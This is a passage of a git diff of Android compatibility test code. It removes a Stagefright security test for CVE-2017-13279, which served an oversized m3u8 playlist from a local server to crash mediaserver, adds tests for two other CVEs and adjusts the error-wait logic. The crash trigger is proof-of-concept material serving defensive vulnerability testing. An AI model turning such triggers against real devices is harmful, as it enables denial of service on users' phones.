"a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\n").getBytes()); - } - catch(IOException e){ - } - } - }; - server.start(); - String uri = "http://127.0.0.1:8080/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" - + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/" - + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.m3u8"; - final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener(); - - LooperThread t = new LooperThread(new Runnable() { - @Override - public void run() { - - MediaPlayer mp = new MediaPlayer(); - mp.setOnErrorListener(mpcl); - mp.setOnPreparedListener(mpcl); - mp.setOnCompletionListener(mpcl); - RenderTarget renderTarget = RenderTarget.create(); - Surface surface = renderTarget.getSurface(); - mp.setSurface(surface); - AssetFileDescriptor fd = null; - try { - mp.setDataSource(uri); - mp.prepareAsync(); - } catch (IOException e) { - Log.e(TAG, e.toString()); - } finally { - closeQuietly(fd); - } - - Looper.loop(); - mp.release(); - } - }); - t.start(); - Thread.sleep(60000); // Poc takes a while to crash mediaserver, waitForError - // doesn't wait long enough - assertFalse("Device *IS* vulnerable to CVE-2017-13279", - mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED); - t.stopLooper(); - t.join(); // wait for thread to exit so we're sure the player was released - server.join(); - } - - @Test - @SecurityTest(minPatchLevel = "2018-04") public void testStagefright_cve_2017_13276() throws Exception { doStagefrightTest(R.raw.cve_2017_13276); } @@ -1259,6 +1174,18 @@ public class StagefrightTest { ***********************************************************/ @Test + @SecurityTest(minPatchLevel = "2019-04") + public void testStagefright_cve_2019_2245() throws Exception { + doStagefrightTest(R.raw.cve_2019_2245); + } + + @Test + @SecurityTest(minPatchLevel = "2019-04") + public void testStagefright_cve_2018_13925() throws Exception { + doStagefrightTest(R.raw.cve_2018_13925); + } + + @Test @SecurityTest(minPatchLevel = "2020-12") public void testStagefright_cve_2020_11139() throws Exception { doStagefrightTest(R.raw.cve_2020_11139); @@ -1934,7 +1861,9 @@ public class StagefrightTest { Thread.sleep(CHECK_INTERVAL); timeout -= CHECK_INTERVAL; } + if (!reportFile.exists() || !reportFile.isFile() || !lockFile.exists()) { + Log.e(TAG, "couldn't get the report or lock file"); return null; } try (BufferedReader reader = new BufferedReader(new FileReader(reportFile))) { @@ -1999,7 +1928,9 @@ public class StagefrightTest { if (what != MediaPlayer.MEDIA_ERROR_SERVER_DIED) { what = newWhat; } + lock.lock(); + errored = true; condition.signal(); lock.unlock(); @@ -2022,17 +1953,19 @@ public class StagefrightTest { public int waitForError() throws InterruptedException { lock.lock(); - if (condition.awaitNanos(TIMEOUT_NS) <= 0) { - Log.d(TAG, "timed out on waiting for error"); + if (!errored && !completed) { + if (condition.awaitNanos(TIMEOUT_NS) <= 0) { + Log.d(TAG, "timed out on waiting for error. " + + "errored: " + errored + ", completed: " + completed); + } } lock.unlock(); - if (what != 0) { + if (what == MediaPlayer.MEDIA_ERROR_SERVER_DIED) { // Sometimes mediaserver signals a decoding error first, and *then* crashes // due to additional in-flight buffers being processed, so wait a little // and see if more errors show up. + Log.e(TAG, "couldn't get media crash yet, waiting 1 second"); SystemClock.sleep(1000); - } - if (what == MediaPlayer.MEDIA_ERROR_SERVER_DIED) { JSONArray crashes = getCrashReport(name.getMethodName(), 5000); if (crashes == null) { Log.e(TAG, "Crash results not found for test " + name.getMethodName()); @@ -2045,8 +1978,8 @@ public class StagefrightTest { // 0 is the code for no error. return 0; } - } + Log.d(TAG, "waitForError finished with no errors."); return what; } @@ -2063,6 +1996,7 @@ public class StagefrightTest { Condition condition = lock.newCondition(); int what; boolean completed = false; + boolean errored = false; } class LooperThread extends Thread { diff --git a/tests/tests/textclassifier/Android.bp b/tests/tests/textclassifier/Android.bp index ffd193fda7c..8ba2eb973fc 100644 --- a/tests/tests/textclassifier/Android.bp +++ b/tests/tests/textclassifier/Android.bp @@ -22,7 +22,7 @@ android_test { "cts", "vts10", "general-tests", - "mts" + "mts-extservices" ], libs: ["android.test.base.stubs"], static_libs: [ diff --git a/tests/tests/util/Android.bp b/tests/tests/util/Android.bp index 9ed5826d719..c7d5d8dfa31 100644 --- a/tests/tests/util/Android.bp +++ b/tests/tests/util/Android.bp @@ -20,7 +20,7 @@ android_test { "cts", "vts10", "general-tests", - "mts", + "mts-statsd", ], libs: ["android.test.runner.stubs"], static_libs: [ diff --git a/tests/tests/wifi/Android.bp b/tests/tests/wifi/Android.bp index 38a990f7cb1..06b6234a830 100644 --- a/tests/tests/wifi/Android.bp +++ b/tests/tests/wifi/Android.bp @@ -39,7 +39,8 @@ android_test { "cts", "vts10", "general-tests", - "mts", + "mts-tethering", + "mts-wifi", "sts", ], diff --git a/tests/tests/wifi/src/android/net/wifi/cts/WifiInfoTest.java b/tests/tests/wifi/src/android/net/wifi/cts/WifiInfoTest.java index 22124eb3114..643f42d709d 100644 --- a/tests/tests/wifi/src/android/net/wifi/cts/WifiInfoTest.java +++ b/tests/tests/wifi/src/android/net/wifi/cts/WifiInfoTest.java @@ -233,7 +233,7 @@ public class WifiInfoTest extends WifiJUnit3TestBase { .build(); // different instances - assertThat(info1).isNotSameAs(info2); + assertThat(info1).isNotSameInstanceAs(info2); // assert that info1 didn't change assertThat(info1.getSSID()).isEqualTo("\"" + TEST_SSID + "\""); |